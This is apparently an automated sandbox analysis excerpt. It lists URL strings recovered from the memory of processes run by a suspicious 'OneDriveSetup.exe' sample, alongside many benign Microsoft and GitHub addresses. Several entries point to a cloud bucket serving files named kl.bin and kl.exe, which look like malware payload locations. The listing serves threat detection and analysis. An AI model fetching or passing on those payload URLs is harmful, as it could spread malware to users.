                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1306288662.0000005A74CF6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.bin
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.bin7=P
                Source: tapinstall.exe, 0000001D.00000002.1812577147.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001F.00000002.1855006455.0000000001480000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001F.00000002.1854100176.0000000001168000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000025.00000002.1857670351.0000000001620000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000025.00000002.1857450985.0000000001288000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000027.00000002.1860497435.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000027.00000002.1860668358.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000002.1863592000.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000002.1863421207.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002D.00000002.1866511520.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002D.00000002.1866335652.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000030.00000002.1868696603.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000030.00000002.1868823346.0000000003080000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000033.00000002.1871213855.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000033.00000002.1871190855.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.1885278739.000000000111E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.1885405457.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1886784883.000000000170E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1887836806.0000000001B00000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1885809675.0000000001620000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1887905205.0000000003425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe
                Source: cmd.exe, 0000002A.00000002.1863421207.0000000002EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe&
                Source: bin.exe, 00000017.00000002.1961213618.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe?%
                Source: LetsPRO.exe, 00000037.00000002.1886784883.000000000170E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exeU
                Source: powershell.exe, 00000019.00000002.1798485276.00000000030C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exeU-
                Source: tapinstall.exe, 0000001F.00000002.1855006455.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exeUSER
                Source: bin.exe, 00000017.00000002.1961086636.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exeUSERD
                Source: cmd.exe, 00000046.00000002.2068403875.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFIL
                Source: LetsPRO.exe, 00000037.00000002.1886784883.000000000170E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exec
                Source: LetsPRO.exe, 00000036.00000002.1885278739.000000000111E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exedK
                Source: LetsPRO.exe, 00000036.00000002.1885278739.000000000111E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exehK
                Source: powershell.exe, 00000019.00000002.1798485276.00000000030C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exelU
                Source: LetsPRO.exe, 00000037.00000002.1886784883.000000000170E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exex
                Source: OneDriveSetup.exe, 00000000.00000002.1307785996.000001F7948FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: OneDriveSetup.exe, 00000000.00000002.1307785996.000001F7948FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
                Source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/toolkit/dotnet
                Source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/#
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealth
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealthUpdateRingSettingsManager::TryUpdateF:
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodb0.010.03ar;bg;ca;cs;da;de;el;en;en-GB;e
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodbK)
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey25.016393=%I.%M
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track8N
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                Source: svchost.exe, 00000002.00000003.1364654268.000001DA2385A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372377947.000001DA23870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364756986.000001DA23843000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364131610.000001DA2386E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000002.00000003.1363995897.000001DA23874000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372421740.000001DA23876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000002.00000003.1364654268.000001DA2385A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1371957915.000001DA2382B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference?client_type=gtag
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/sending-events?client_type
                Source: bin.exe, 00000017.00000003.1519770378.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typ
                Source: svchost.exe, 00000002.00000003.1365212374.000001DA2382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000002.00000002.1372057953.000001DA2383F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000002.00000003.1364756986.000001DA23843000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364498680.000001DA2385E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1371957915.000001DA2382B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://g.live.com/odclientsettings/EnterpriseV2https://g.live.com/odclientsettings/MsitFastV2https:
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/InsidersV2RCHIT
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitFastV2ES-PC
                Source: OneDriveSetup.exe, 00000000.00000002.1307202481.000001F792C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/MsitSlowV2;.BAT
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkit
                Source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkitO
                Source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/dotnet
                Source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                Source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                Source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
                Source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
                Source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                Source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                Source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e772
                Source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e7728
                Source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                Source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime&
                Source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/wcf
                Source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnetprojects/SVGImage
                Source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/myuser/myrepo
                Source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms
                Source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
                Source: bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680154595.0000000002737000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1684349582.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683479297.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1680953747.000000000273A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2825583-killer-%E7%BD%91%E5%8D%A1%E9%9C%80%E8%A6%81%
                Source: bin.exe, 00000017.00000003.1671418506.0000000002733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
